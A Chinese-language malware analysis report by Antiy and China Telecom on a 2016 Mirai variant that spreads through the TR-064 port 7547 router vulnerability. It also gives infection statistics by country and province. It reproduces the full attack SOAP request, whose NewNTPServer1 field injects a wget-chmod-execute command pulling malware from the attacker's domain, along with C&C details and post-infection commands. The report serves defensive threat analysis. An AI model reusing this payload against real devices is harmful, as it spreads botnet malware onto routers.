安天追影小组分析Mirai变种新传播方式
安天联合电信云堤发布针对Mirai新变种威胁分析报告,利用捕风蜜罐捕获到Mirai新变种,该变种采用最近公布的7547端口漏洞,并对公布漏洞的payload进行了修改使之可以下载执行Mirai。通过互联网流量监控发现了大量IoT设备进行7547端口扫描,这些设备已经被新Mirai变种攻陷,目前监测到超过30万IoT设备感染。
近期披露的D1000TR064 服务器 TCP 端口 7547漏洞,通过发送某些 TR 064 命令,可以指示运行该服务的设备打开防火墙上的 80端口。允许从互联网访问设备的web 管理界面。D1000 的默认登录密码是默认 Wi-fi 密码,也可以通过另一个TR064指令获取。该漏洞关键代码是向端口7547发送TR 064命令,设置新NTP服务器的方式,在NewNTPServer1中采用指令iptables -IINPUT -p tcp --dport 80 -j ACCEPT解除防火墙对80访问限制。以下是重要的代码片段:
register_options(
[
Opt::RPORT(7547), # CWMP port
], self.class)
@data_cmd_template = "<?xml version=\"1.0\"?>"
@data_cmd_template << "<SOAP-ENV:Envelopexmlns:SOAP-ENV=\"" SOAP-ENV:encodingStyle=\"">"
@data_cmd_template << " <SOAP-ENV:Body>"
@data_cmd_template << " <u:SetNTPServersxmlns:u=\"urn:dslforum-org:service:Time:1\">"
@data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
@data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
@data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
@data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
@data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
@data_cmd_template << " </u:SetNTPServers>"
@data_cmd_template << " </SOAP-ENV:Body>"
@data_cmd_template << "</SOAP-ENV:Envelope>"
Mirai变种的C&C配置加密方式与源码泄露的家族没有变化。连接C&C服务器timeserver.host()的23端口,上线包数据为0x00000001。
在被感染的路由器执行以下命令:
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP busybox killall -9 telnetd |
第一个命令是关闭7547端口,是为了避免重复感染,也使其他攻击者不能再利用这个漏洞;第二个命令是停止telnet服务,使用户无法远程更新固件。然后,生成随机IP,对这些IP的7547端口进行扫描与漏洞入侵。样本利用7547漏洞进行了相应的改造,使攻击直接下载远程样本,修改可执行模式并且运行。该样本中包含三个远程样本URL,分别为:http://l.ocalhost.host/1、http:// l.ocalhost.host/2、http:// l.ocalhost.host/3。
攻击代码POST数据如下:
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
该放马域名是黑客利用漏洞快速传播Mirai变种之前新注册2016年11月26日解析的IP包括两个:
2016-11-28
2016-11-27
通过电信云堤抽样流量分析获得如下信息:
确认被感染具有7547扫描能力的节点主要通过包括扫描节点自身是IoT设备,扫描节点多次使用相同端口扫描,扫描节点发出攻击漏洞方法进行发现。
确认感染设备总数:306778
感染设备主要开放服务或设备信息包括RomPager/4.07、DVRDVS、TR069 Connect Request Server、DHT Nodes、HuaweiHomeGateway。
目前发现感染的主要节点分布地区 (列表)
地区 | 感染设备总数 |
巴西 | 107166 |
英国 | 61854 |
爱尔兰 | 18268 |
拉美其它地区 | 17210 |
土耳其 | 13863 |
伊朗 | 11573 |
澳大利亚 | 8002 |
泰国 | 7159 |
意大利 | 6243 |
芬兰 | 5294 |
智利 | 4937 |
阿根廷 | 3659 |
中国 | 3321 |
法国 | 2160 |
巴基斯坦 | 2095 |
其它北美地区(非美国) | 1916 |
希腊 | 1712 |
罗马尼亚 | 1485 |
印度 | 1197 |
西班牙 | 1187 |
越南 | 761 |
俄罗斯 | 599 |
德国 | 529 |
美国 | 488 |
马来西亚 | 471 |
其它欧洲和中东地区 | 367 |
瑞典 | 352 |
玻利维亚 | 341 |
格鲁吉亚 | 341 |
其它欧洲地区 | 260 |
新西兰 | 224 |
塞尔维亚 | 169 |
捷克 | 140 |
南非 | 108 |
其它亚太地区 | 102 |
瑞士 | 98 |
哥伦比亚 | 91 |
阿尔巴尼亚 | 87 |
其它非洲地区 | 79 |
马达加斯加 | 75 |
摩洛哥 | 72 |
丹麦 | 69 |
波斯尼亚和黑塞哥维那 | 67 |
洪都拉斯 | 67 |
秘鲁 | 64 |
埃及 | 43 |
爱沙尼亚 | 33 |
日本 | 31 |
阿塞拜疆 | 30 |
波兰 | 27 |
圣马力诺 | 26 |
斯洛伐克 | 15 |
印度尼西亚 | 13 |
立陶宛 | 11 |
利比亚 | 11 |
阿曼 | 10 |
韩国 | 10 |
科威特 | 10 |
阿联酋 | 9 |
葡萄牙 | 9 |
奥地利 | 7 |
菲律宾 | 7 |
荷兰 | 7 |
乌克兰 | 7 |
叙利亚 | 6 |
阿尔及利亚 | 5 |
巴拉圭 | 5 |
塞内加尔 | 5 |
也门 | 5 |
巴勒斯坦 | 4 |
巴林 | 4 |
冈比亚 | 4 |
加拿大 | 4 |
卢森堡 | 4 |
马尔代夫 | 4 |
萨尔瓦多 | 4 |
伊拉克 | 4 |
比利时 | 3 |
哈萨克斯坦 | 3 |
拉脱维亚 | 3 |
新加坡 | 3 |
新喀里多尼亚 | 3 |
冰岛 | 2 |
科特迪瓦 | 2 |
黎巴嫩 | 2 |
挪威 | 2 |
沙特阿拉伯 | 2 |
坦桑尼亚 | 2 |
以色列 | 2 |
多米尼加 | 1 |
佛得角 | 1 |
黑山 | 1 |
加蓬 | 1 |
老挝 | 1 |
孟加拉 | 1 |
摩尔多瓦 | 1 |
莫桑比克 | 1 |
尼泊尔 | 1 |
尼日利亚 | 1 |
所罗门群岛 | 1 |
委内瑞拉 | 1 |
乌兹别克斯坦 | 1 |
亚美尼亚 | 1 |
国内部分感染节点分布图:
注:本图由电信云堤提供
国内感染节点分布表
省份 | 感染设备总数 |
广东省 | 508 |
江苏省 | 345 |
浙江省 | 240 |
福建省 | 219 |
湖北省 | 186 |
上海市 | 182 |
山东省 | 176 |
湖南省 | 148 |
四川省 | 131 |
河南省 | 107 |
北京市 | 94 |
广西省 | 93 |
安徽省 | 92 |
河北省 | 89 |
云南省 | 78 |
辽宁省 | 77 |
陕西省 | 62 |
天津市 | 56 |
江西省 | 55 |
山西省 | 55 |
贵州省 | 51 |
重庆市 | 51 |
吉林省 | 40 |
黑龙江省 | 38 |
甘肃省 | 31 |
香港 | 17 |
海南省 | 17 |
台湾 | 11 |
西藏自治区 | 5 |
宁夏回族自治区 | 4 |
青海省 | 2 |
澳门 | 尚未发现 |
参考文献链接:
[1].
[2]. https://www.broadband-forum.org/technical/download/TR-064.pdf
注:
本分析报告由安天追影小组与电信云堤联合发布,如您认为对网络安全有价值,请转载时注明,并附上链接。
本分析报告错漏缺点在所难免,敬请业内专家和研究者回帖指点批评指正。
安天
安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业。安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局。安天的监控预警能力覆盖全国、产品与服务辐射多个国家。安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期。结合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案。
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护。安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品。
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一。安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案。
安天实验室更多信息请访问:
http://www.antiy.com(中文)
http://www.antiy.net(英文)
安天企业安全公司更多信息请访问:
http://www.antiy.cn
安天移动安全公司(AVL TEAM)更多信息请访问:
http://www.avlsec.com